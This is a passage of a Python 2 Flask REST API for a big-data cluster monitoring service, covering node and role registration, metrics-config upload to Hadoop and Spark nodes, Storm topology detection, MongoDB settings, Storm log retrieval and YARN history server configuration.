file.save(dbLoc)
response = jsonify({'Status': 'Done',
'Message': 'New DB loaded'})
response.status_code = 201
app.logger.info('[%s] : [INFO] New database loaded',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
# @dmon.route('/v1/overlord/core/state')
# class OverlordCoreState(Resource):
# def get(self):
# qAll = db.session.query(dbNodes.nodeFQDN, dbSCore.hostFQDN, dbESCore.hostFQDN, dbKBCore.hostFQDN, dbApp.appName, dbCDHMng.cdhMng).all()
# payload ={}
# for res in qAll:
# qNodes = dbNodes.query.filter_by(nodeFQDN=res[0]).first()
@dmon.route('/v1/overlord/core/status')
class OverlordCoreStatus(Resource):
def get(self):
rspD = {}
        qESCore = dbESCore.query.filter_by(
            MasterNode=1).first()  # TODO -> currently only generates config file for master node
if qESCore is None:
response = jsonify({"Status": "No master ES instances found!"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No Master ES Instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
try:
esCoreUrl = 'http://' + qESCore.hostIP + ':' + str(qESCore.nodePort)
r = requests.get(esCoreUrl, timeout=DMON_TIMEOUT) # timeout in seconds
except:
response = jsonify({"Error": "Master ES instances not reachable!"})
response.status_code = 500
app.logger.error('[%s] : [ERROR] ES instance not responding at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), esCoreUrl)
return response
qLSCore = dbSCore.query.first() # TODO: -> only works for single LS deployment
if qLSCore is None:
response = jsonify({"Status": "No LS instances found!"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No LS Instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qKBCore = dbKBCore.query.first()
if qKBCore is None:
response = jsonify({"Status": "No KB instances found!"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No KB Instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
rsp = r.json()
rspES = {'ElasticSearch': rsp}
LSVer = os.getenv('LS_VERSION', '2.2.0')
KBVer = os.getenv('KB_VERSION', '4.3.1')
rspLS = {'Logstash': {'Status': qLSCore.LSCoreStatus, 'Version': str(LSVer)}}
rspKB = {'Kibana': {'Status': qKBCore.KBCoreStatus, 'Version': str(KBVer)}}
rspD.update(rspES)
rspD.update(rspLS)
rspD.update(rspKB)
response = jsonify(rspD)
response.status_code = 200
return response
# @dmon.route('/v1/overlord/core/chef')
# class ChefClientStatus(Resource):
# def get(self):
# return "Monitoring Core Chef Client status"
#
#
# @dmon.route('/v1/overlord/nodes/chef')
# class ChefClientNodes(Resource):
# def get(self):
# return "Chef client status of monitored Nodes"
@dmon.route('/v1/overlord/nodes') # TODO -checkOS and -checkRoles
class MonitoredNodes(Resource):
def get(self):
nodeList = []
nodesAll = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP).all()
if nodesAll is None:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No registered nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
for nl in nodesAll:
nodeDict = {}
# print >>sys.stderr, nl[0]
app.logger.info('[%s] : [INFO] Node %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nl[0])
nodeDict.update({nl[0]: nl[1]})
nodeList.append(nodeDict)
response = jsonify({'Nodes': nodeList})
app.logger.info('[%s] : [INFO] Registered nodes %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeList))
response.status_code = 200
return response
@api.expect(nodeSubmit)
def put(self):
if not request.json:
abort(400)
listN = []
if "Nodes" not in request.json:
response = jsonify({'Status': 'Malformed request',
'Message': 'JSON payload malformed'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed json request',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nLSI = ''
for nodes in request.json['Nodes']:
qNodes = dbNodes.query.filter_by(nodeFQDN=nodes['NodeName']).first()
qNodeLSinstance = dbSCore.query.first()
if qNodes is None:
if 'LogstashInstance' not in nodes:
if qNodeLSinstance is None:
nLSI = 'None'
app.logger.warning('[%s] : [WARN] No LS Instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
else:
nLSI = qNodeLSinstance.hostIP
app.logger.info('[%s] : [INFO] LS Instance %s assigned to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
nodes['NodeName'], qNodeLSinstance.hostFQDN)
else:
nLSI = nodes['LogstashInstance']
app.logger.info('[%s] : [INFO] LS Instance at %s assigned to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
nLSI, nodes['NodeName'])
if 'NodeOS' not in nodes:
nodeOS = 'unknown'
else:
nodeOS = nodes['NodeOS']
if 'key' not in nodes:
nodeKey = 'unknown'
else:
nodeKey = nodes['key']
e = dbNodes(nodeFQDN=nodes['NodeName'], nodeIP=nodes['NodeIP'], nodeOS=nodeOS,
nkey=nodeKey, nUser=nodes['username'], nPass=nodes['password'], nLogstashInstance=nLSI)
db.session.add(e)
else:
qNodes.nodeIP = nodes['NodeIP']
if 'NodeOS' in nodes:
qNodes.nodeOS = nodes['NodeOS']
if 'key' in nodes:
qNodes.nkey = nodes['key']
qNodes.nUser = nodes['username']
qNodes.nPass = nodes['password']
if 'LogstashInstance' not in nodes:
nLSI = qNodeLSinstance.hostIP
else:
nLSI = nodes['LogstashInstance']
app.logger.info('[%s] : [INFO] LS Instance changed for node %s from %s to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
qNodes.nodeFQDN, qNodes.nLogstashInstance, nLSI)
qNodes.nLogstashInstance = nLSI
db.session.add(qNodes)
        db.session.commit()
response = jsonify({'Status': "Nodes list Updated!"})
response.status_code = 201
app.logger.info('[%s] : [INFO] Nodes updated',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
def post(self): #todo
return "Bootstrap monitoring"
@dmon.route('/v1/overlord/nodes/roles')
class ClusterRoles(Resource):
def get(self):
nodeList = []
nodesAll = db.session.query(dbNodes.nodeFQDN, dbNodes.nRoles).all()
if nodesAll is None:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No registered nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
for nl in nodesAll:
nodeDict = {}
app.logger.info('[%s] : [INFO] Node name -> %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nl[0]))
nodeDict.update({nl[0]: nl[1].split(', ')})
nodeList.append(nodeDict)
response = jsonify({'Nodes': nodeList})
        app.logger.info('[%s] : [INFO] Nodes and their associated roles %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeList))
response.status_code = 200
return response
@api.expect(listNodeRoles)
def put(self):
if not request.json:
response = jsonify({'Status': 'Malformed Request',
'Message': 'Only JSON requests are permitted'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed request, not JSON',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if "Nodes" not in request.json:
response = jsonify({'Status': 'Malformed Request',
'Message': 'Missing key(s)'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed request, missing Node key',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nrNodes = len(request.json['Nodes'])
for n in range(nrNodes):
if "NodeName" not in request.json['Nodes'][n]:
response = jsonify({'Status': 'Malformed Request',
'Message': 'Missing key(s)'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed request, missing NodeName key',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nList = request.json["Nodes"]
for n in nList:
# print n["NodeName"]
# print n["Roles"]
upRoles = dbNodes.query.filter_by(nodeFQDN=n["NodeName"]).first()
if upRoles is None:
response = jsonify({'Status': 'Node Name Error',
'Message': 'Node ' + str(n["NodeName"]) + ' not found!'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] Node %s not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(n["NodeName"]))
return response
for r in n["Roles"]:
if r not in lFrameworks:
response = jsonify({'Status': 'Error',
'Message': 'Unknown role in ' + str(r)})
response.status_code = 400
return response
upRoles.nRoles = ', '.join(map(str, n["Roles"]))
response = jsonify({'Status': 'Done',
'Message': 'All roles updated!'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Node roles updated',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
def post(self):
nodes = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP, dbNodes.nUser, dbNodes.nPass, dbNodes.nRoles).all()
if nodes is None:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
            app.logger.warning('[%s] : [WARN] No registered nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
yarnList = []
sparkList = []
stormList = []
unknownList = []
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
propYarnTmp = os.path.join(tmpDir, 'metrics/hadoop-metrics2.tmp')
propYarnFile = os.path.join(cfgDir, 'hadoop-metrics2.properties')
try:
template = templateEnv.get_template(propYarnTmp)
except:
response = jsonify({'Status': 'I/O Error', 'Message': 'Template file missing!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] YARN template file missing',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qPeriod = dbMetPer.query.first()
if qPeriod is None:
period = '10'
else:
period = qPeriod.yarnMet
infoYarn = {'metrics2_period': period}
        propYarnInfo = template.render(infoYarn)
        propYarnConf = open(propYarnFile, "w+")
        propYarnConf.write(propYarnInfo)
propYarnConf.close()
for node in nodes:
            roleList = [r.strip() for r in node[4].split(',')]
if 'yarn' in roleList or 'hdfs' in roleList:
nl = []
nl.append(node[1])
uploadFile(nl, node[2], node[3], propYarnFile, 'hadoop-metrics2.tmp',
'/etc/hadoop/conf.cloudera.yarn/hadoop-metrics2.properties') # TODO better solution
uploadFile(nl, node[2], node[3], propYarnFile, 'hadoop-metrics2.tmp', #TODO instead of tmp add polling interval
'/etc/hadoop/conf.cloudera.hdfs/hadoop-metrics2.properties') # TODO better solution
uploadFile(nl, node[2], node[3], propYarnFile, 'hadoop-metrics2.tmp',
'/etc/hadoop/conf/hadoop-metrics2.properties') # TODO better solution
yarnList.append(node[0])
app.logger.info('[%s] : [INFO] HDFS/YARN conf upload to %s, %s, %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nl),
str(node[2]), str(node[3]))
if 'spark' in roleList: # TODO Same as /v1/overlord/framework/<fwork>, needs unification
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
propSparkTemp = os.path.join(tmpDir, 'metrics/spark-metrics.tmp')
propSparkFile = os.path.join(cfgDir, 'metrics.properties')
try:
template = templateEnv.get_template(propSparkTemp)
except:
response = jsonify({'Status': 'I/O Error', 'Message': 'Template file missing!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] Spark properties template missing',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qLSCore = dbSCore.query.first() # TODO: Only works for single deployment
if qLSCore is None:
response = jsonify({'Status': 'Missing Instance', 'Message': 'No Logstash Instance Configured'})
response.status_code = 404
                    app.logger.warning('[%s] : [WARN] No LS instance registered',
                                       datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qPeriod = dbMetPer.query.first()
if qPeriod is None:
period = '10'
else:
period = qPeriod.sparkMet
infoSpark = {'logstashserverip': qLSCore.hostIP, 'logstashportgraphite': '5002', 'period': period}
app.logger.info(
'[%s] : [INFO] Spark Config used based on role def: LSServer -> %s, Graphite -> 5002, Period -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qLSCore.hostIP, period)
propSparkInfo = template.render(infoSpark)
propSparkConf = open(propSparkFile, "w+")
propSparkConf.write(propSparkInfo)
propSparkConf.close()
nl = []
nl.append(node[1])
uploadFile(nl, node[2], node[3], propSparkFile, 'metrics.properties',
'/etc/spark/conf/metrics.properties') # TODO better solution
sparkList.append(node[0])
app.logger.info('[%s] : [INFO] Spark conf upload to %s, %s, %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nl),
str(node[2]), str(node[3]))
if 'storm' in roleList:
stormList.append(node[0]) # TODO
if 'unknown' in roleList:
unknownList.append(node[0])
response = jsonify(
{'Status': {'yarn': yarnList, 'spark': sparkList, 'storm': stormList, 'unknown': unknownList}})
response.status_code = 200
app.logger.info('[%s] : [INFO] Status YARN List %s, SPARK List %s, STORM list %s, Unknown LIST %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(yarnList),
str(sparkList), str(stormList), str(unknownList))
return response
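# Storm detection: GET reports the registered topology together with its spout and bolt
# counts, POST tries to detect a running topology from the registered endpoints or nodes.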
@dmon.route('/v1/overlord/detect/storm')
class DetectStormRA(Resource):
def get(self):
qSCore = dbSCore.query.first()
if qSCore is None:
response = jsonify({"Status": "No LS instances registered", "spouts": 0, "bolts": 0})
response.status_code = 500
            app.logger.warning('[%s] : [WARN] No LS instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if qSCore.LSCoreStormTopology == 'None':
response = jsonify({"Status": "No Storm topology registered"})
response.status_code = 404
app.logger.info('[%s] : [INFO] No Storm topology registered, cannot fetch number of spouts and bolts',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
else:
bolts, spouts = checkStormSpoutsBolts(qSCore.LSCoreStormEndpoint, qSCore.LSCoreStormPort, qSCore.LSCoreStormTopology)
response = jsonify({'Topology': qSCore.LSCoreStormTopology, "spouts": spouts, "bolts": bolts})
response.status_code = 200
            app.logger.info('[%s] : [INFO] Storm topology %s with %s spouts and %s bolts found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCoreStormTopology), str(spouts), str(bolts))
return response
def post(self):
qNode = dbNodes.query.all()
if qNode is None:
response = jsonify({'Status': 'No registered nodes'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qLSStorm = dbSCore.query.all()
if not qLSStorm:
response = jsonify({'Status': 'No registered logstash server'})
response.status_code = 404
            app.logger.warning('[%s] : [WARN] No Logstash instance found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
regStorm = {}
for l in qLSStorm:
if l.LSCoreStormEndpoint != 'None':
app.logger.info('[%s] : [INFO] Found Storm Endpoint set to %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), l.LSCoreStormEndpoint)
if validateIPv4(l.LSCoreStormEndpoint):
if l.LSCoreStormPort.isdigit():
regStorm[l.LSCoreStormEndpoint] = l.LSCoreStormPort
app.logger.info('[%s] : [INFO] Storm REST Port is %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), l.LSCoreStormPort)
else:
regStorm[l.LSCoreStormEndpoint] = '8080'
l.LSCoreStormPort = '8080'
app.logger.info('[%s] : [INFO] Storm REST Port set to default -> 8080',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
if l.LSCoreStormTopology != 'None':
try:
getTop = detectStormTopology(l.LSCoreStormEndpoint, l.LSCoreStormPort)
except Exception as inst:
app.logger.warning('[%s] : [WARNING] Error while trying enpoint -> %s port -> %s; with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), l.LSCoreStormEndpoint, l.LSCoreStormPort,
type(inst), inst.args)
getTop = 'None'
if l.LSCoreStormTopology == getTop:
response = jsonify({'Status': 'Topology Verified',
'Topology': getTop})
response.status_code = 200
app.logger.info('[%s] : [INFO] Topology %s verified',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), getTop)
return response
foundTopologies = set()
lsTopology = {}
if regStorm:
for k, v in regStorm.iteritems():
try:
topology = detectStormTopology(k, v)
except Exception as inst:
app.logger.warning('[%s] : [WARNING] Error while querying endpoint -> %s port -> %s; with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), k, v,
type(inst), inst.args)
break
foundTopologies.add(topology)
lsTopology[k] = topology
if len(foundTopologies) > 1:
setTopology = next(iter(foundTopologies))
for k, v in lsTopology.iteritems():
qLStorm = dbSCore.query.filter_by(LSCoreStormEndpoint=k).first()
if v == setTopology:
qLStorm.LSCoreStormTopology = setTopology
app.logger.info('[%s] : [INFO] Topology %s set at IP %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), setTopology, k)
break
response = jsonify({'Status': 'Topologies found ' + str(len(foundTopologies)),
'Topologies': list(foundTopologies),
'SetTopology': setTopology})
response.status_code = 201
return response
if lsTopology:
for k, v in lsTopology.iteritems():
qLStorm = dbSCore.query.filter_by(LSCoreStormEndpoint=k).all()
#TODO: adds Port and Storm Topology for all ls instances with the same set of registered Storm Endpoints, need to change in future versions
for e in qLStorm:
e.LSCoreStormTopology = v
app.logger.info('[%s] : [INFO] Topology %s set at IP %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), v, k)
response = jsonify({'Status': 'Topology found',
'Topology': list(foundTopologies)})
response.status_code = 201
return response
stormNodes = []
for n in qNode:
if "storm" in n.nRoles:
stormNodes.append(n.nodeIP)
if not stormNodes:
response = jsonify({'Status': 'Storm role not found'})
response.status_code = 404
app.logger.warning('[%s] : [WARNING] No nodes have storm role',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
resList = []
for n in stormNodes:
url = 'http://%s:%s/api/v1/topology/summary' %(n, '8080')
resList.append(url)
app.logger.info('[%s] : [INFO] Resource list for topology discovery -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), resList)
dmon = GreenletRequests(resList)
nodeRes = dmon.parallelGet()
topoIDs = {}
for i in nodeRes:
nodeIP = urlparse(i['Node'])
data = i['Data']
if data !='n/a':
try:
topoIDs[nodeIP.hostname] = data.get('topologies')[0]['id']
except Exception as inst:
app.logger.warning('[%s] : [WARN] No topology has been loaded, with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'No topology has been loaded'})
response.status_code = 404
return response
if not topoIDs:
response = jsonify({'Status': 'No Storm detected on registered nodes'})
response.status_code = 404
app.logger.info('[%s] : [INFO] No Storm detected on registered nodes',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
elif len(topoIDs) > 1:
response = jsonify({'Status': 'More than one Storm deployment detected',
'Message': 'Only one deployment per monitoring solution',
'Nodes': topoIDs})
response.status_code = 500
app.logger.info('[%s] : [INFO] More than one Storm detected: %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(topoIDs))
return response
for ls in qLSStorm:
for k, v in topoIDs.iteritems():
ls.LSCoreStormEndpoint = k
ls.LSCoreStormPort = '8080'
ls.LSCoreStormTopology = v
response = jsonify({'Status': 'Detected Storm deployment',
'StormEndpoint': topoIDs.keys()[0],
'StormTopology': topoIDs.get(topoIDs.keys()[0]),
'StormPort': '8080'
})
response.status_code = 201
dmon.reset()
return response
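# Detection flow implemented above (summary): verify any topology already registered on a
# Logstash core entry, otherwise query each registered Storm endpoint, and as a last resort
# probe every node carrying the 'storm' role at http://<node>:8080/api/v1/topology/summary.
# Only one Storm deployment per monitoring solution is accepted; more than one yields HTTP 500.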
@dmon.route('/v1/overlord/mongo')
class MongoSettings(Resource):
def get(self):
qBDS = dbBDService.query.first()
if qBDS is None:
response = jsonify({'Status': 'No registered mongo settings'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No mongo settings found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if qBDS.mongoUser is None:
mUser = False
elif qBDS.mongoUser.strip():
mUser = True
else:
mUser = False
if qBDS.mongoPswd is None:
mPass = False
elif qBDS.mongoPswd.strip():
mPass = True
else:
mPass = False
response = jsonify({'MongoHost': qBDS.mongoHost, 'MongoPort': qBDS.mongoPort,
'User': mUser, 'Password': mPass, 'MongoDBs': qBDS.mongoDBs})
response.status_code = 200
return response
@api.expect(mongoDBConf)
def put(self):
if not request.json:
abort(400)
requiredKeys = ['MongoHost', 'MongoPort']
for key in requiredKeys:
if key not in request.json:
response = jsonify({'Error': 'malformed request, missing key(s)'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed Request, missing key(s)',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if 'MongoUser' not in request.json:
mUser = ''
else:
mUser = request.json['MongoUser']
if 'MongoPassword' not in request.json:
mPass = 'password'
else:
mPass = request.json['MongoPassword']
if 'MongoDBs' not in request.json:
dbs = 'admin'
else:
dbs = request.json['MongoDBs']
qBDS = dbBDService.query.first()
if qBDS is None:
# {'MongoHost': qBDS.mongoHost, 'MongoPort': qBDS.mongoPort,
# 'User': mUser, 'Password': mPass, 'MongoDBs': qBDS.mongoDBs})
e = dbBDService(mongoHost=request.json['MongoHost'], mongoPort=request.json['MongoPort'], mongoUser=mUser,
mongoPswd=mPass, mongoDBs=dbs)
db.session.add(e)
db.session.commit()
response = jsonify({'Status': 'Added MongoDB Settings'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Added MongoDB settings: Host -> %s, Port -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(request.json['MongoHost']), str(request.json['MongoPort']))
return response
else:
qBDS.mongoHost = request.json['MongoHost']
qBDS.mongoPort = request.json['MongoPort']
qBDS.mongoUser = mUser
qBDS.mongoPswd = mPass
qBDS.mongoDBs = dbs
response = jsonify({'Status': 'Modified MongoDB Settings'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Modified MongoDB settings: Host -> %s, Port -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(request.json['MongoHost']), str(request.json['MongoPort']))
return response
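# Illustrative PUT body for /v1/overlord/mongo (values are assumptions; only MongoHost and
# MongoPort are required by the handler above, the remaining keys default to '' / 'password'
# / 'admin' respectively):
#   {"MongoHost": "10.0.0.5", "MongoPort": "27017",
#    "MongoUser": "dmon", "MongoPassword": "secret", "MongoDBs": "admin"}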
@dmon.route('/v1/overlord/storm/logs')
class StormLogs(Resource):
def get(self):
workerFile = 'workerlogs_*.tar'
lFile = []
for name in glob.glob(os.path.join(outDir, workerFile)):
path, filename = os.path.split(name)
lFile.append(filename)
response = jsonify({'StormLogs': lFile})
response.status_code = 200
app.logger.info('[%s] : [INFO] Available Storm logs %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(lFile))
return response
def post(self):
nodeList = []
nodesAll = db.session.query(dbNodes.nodeFQDN, dbNodes.nRoles, dbNodes.nodeIP).all()
try:
global backProc
# alive = backProc.is_alive()
alive = checkPID(int(open(os.path.join(tempDir, 'dsbp.pid')).read()))
if alive:
response = jsonify({'Status': 'Only one background process is permitted', 'PID': str(backProc.pid),
'BProcess': 'Active'})
response.status_code = 409
return response
except Exception as inst:
app.logger.warning('[%s] : [WARN] First startup detected, skipping background process alive check',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
if not nodesAll:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No registered nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
for nl in nodesAll:
app.logger.info('[%s] : [INFO] Node name -> %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nl[0]))
if 'storm' in nl[1].split(', '): #TODO modify to STORM
nodeList.append(nl[2])
if not nodeList:
response = jsonify({'Status': 'No nodes with role storm found'})
response.status_code = 404
return response
stormLogAgent = AgentResourceConstructor(nodeList, '5222')
resourceList = stormLogAgent.stormLogs()
backProc = multiprocessing.Process(target=getStormLogsGreen, args=(resourceList, ))
backProc.daemon = True
backProc.start()
pidFile = os.path.join(tempDir, 'dsbp.pid')
file(pidFile, 'w').write(str(backProc.pid))
response = jsonify({'Status': 'Started background process', 'PID': str(backProc.pid)})
response.status_code = 201
return response
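# The POST handler above runs Storm log collection as a daemonised multiprocessing.Process
# and stores its PID in <tempDir>/dsbp.pid; /v1/overlord/storm/logs/active (below) reads the
# same pid file to report whether the background fetch is still running.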
@dmon.route('/v1/overlord/storm/logs/active')
class StormLogFetchActive(Resource):
def get(self):
try:
pid = int(open(os.path.join(tempDir, 'dsbp.pid')).read())
alive = checkPID(int(open(os.path.join(tempDir, 'dsbp.pid')).read()))
# pid = str(backProc.pid)
# alive = str(backProc.is_alive())
except Exception as inst:
app.logger.warning('[%s] : [WARN] No Background proc detected with %s and %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'No background process detected'})
response.status_code = 404
return response
response = jsonify({'PID': pid,
'Alive': alive})
response.status_code = 200
return response
@dmon.route('/v1/overlord/storm/logs/<log>')
class StormLogsLog(Resource):
def get(self, log):
if not os.path.isfile(os.path.join(outDir, log)):
response = jsonify({'Status': 'Not found',
'StormLog': log})
response.status_code = 404
app.logger.warning('[%s] : [WARN] Storm log %s not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), log)
return response
app.logger.info('[%s] : [INFO] Served Storm log %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), log)
return send_from_directory(outDir, log, as_attachment=True, mimetype='application/tar')
@dmon.route('/v1/overlord/detect/yarn')
class DetectYarnHS(Resource):
def get(self):
qDBS = dbBDService.query.first()
if qDBS is None:
response = jsonify({'Status': 'Not Found',
'Message': 'No Yarn history server instance found'})
response.status_code = 404
return response
response = jsonify({'NodePort': qDBS.yarnHPort,
'NodeIP': qDBS.yarnHEnd,
'Polling': qDBS.yarnHPoll})
response.status_code = 200
return response
@api.expect(yarnHistorySettings)
def put(self):
if not request.json:
abort(400)
qBDS = dbBDService.query.first()
if 'NodeIP' not in request.json:
nodeIP = 0
else:
nodeIP = request.json['NodeIP']
if 'NodePort' not in request.json:
nodePort = 0
else:
nodePort = request.json['NodePort']
if 'Polling' not in request.json:
poll = 0
else:
poll = request.json['Polling']
if qBDS is None:
if not nodeIP:
response = jsonify({'Status': 'Missing parameter',
'Message': 'Yarn History server IP must be defined at first submit'})
response.status_code = 406
return response
if not nodePort:
nodePort = 19888
if not poll:
poll = 30
upBDS = dbBDService(yarnHPort=nodePort, yarnHEnd=nodeIP, yarnHPoll=poll)
db.session.add(upBDS)
db.session.commit()
app.logger.info('[%s] : [INFO] Added Yarn History Server Node info',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Added Yarn History',
'Message': 'Added Yarn History server info'})
response.status_code = 200
return response
else:
if nodeIP:
qBDS.yarnHEnd = nodeIP
app.logger.info('[%s] : [INFO] Updated Yarn History Server Endpoint to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeIP)
if nodePort:
qBDS.yarnHPort = nodePort
app.logger.info('[%s] : [INFO] Updated Yarn History Server Port to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodePort))
if poll:
qBDS.yarnHPoll = poll
app.logger.info('[%s] : [INFO] Updated Yarn History Server Polling period to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(poll))
response = jsonify({'Status': 'Updated Yarn History',
'Message': 'Update Yarn History server info'})
response.status_code = 200
return response
def post(self):
#yarnDetect = DetectBDService()
response = servDet.detectYarnHS()
return response
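# Illustrative PUT body for /v1/overlord/detect/yarn (values are assumptions; NodeIP is
# mandatory on the first submit, NodePort defaults to 19888 and Polling to 30):
#   {"NodeIP": "10.0.0.10", "NodePort": 19888, "Polling": 30}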
@dmon.route('/v1/overlord/detect/spark')
class DetectSparkHS(Resource):
def get(self):
return 'Get spark history server settings'
def put(self):
return 'Define or modify spark history server endpoint'
def post(self):
return 'Define or modify spark history server endpoint'
@dmon.route('/v1/overlord/history/yarn')
class YarnHistoryServer(Resource):
def get(self):
qBDService = dbBDService.query.first()
if qBDService is None:
app.logger.warning('[%s] : [WARN] No entry for Yarn History server found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'No Yarn History server entry found'})
response.status_code = 404
return response
elif qBDService.yarnHEnd == 'None':
app.logger.warning('[%s] : [WARN] Yarn History server not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Yarn History server not registered'})
response.status_code = 404
return response
else:
try:
yarnJobsStatus, yarnJobs = getYarnJobs(qBDService.yarnHEnd, qBDService.yarnHPort)
except Exception as inst:
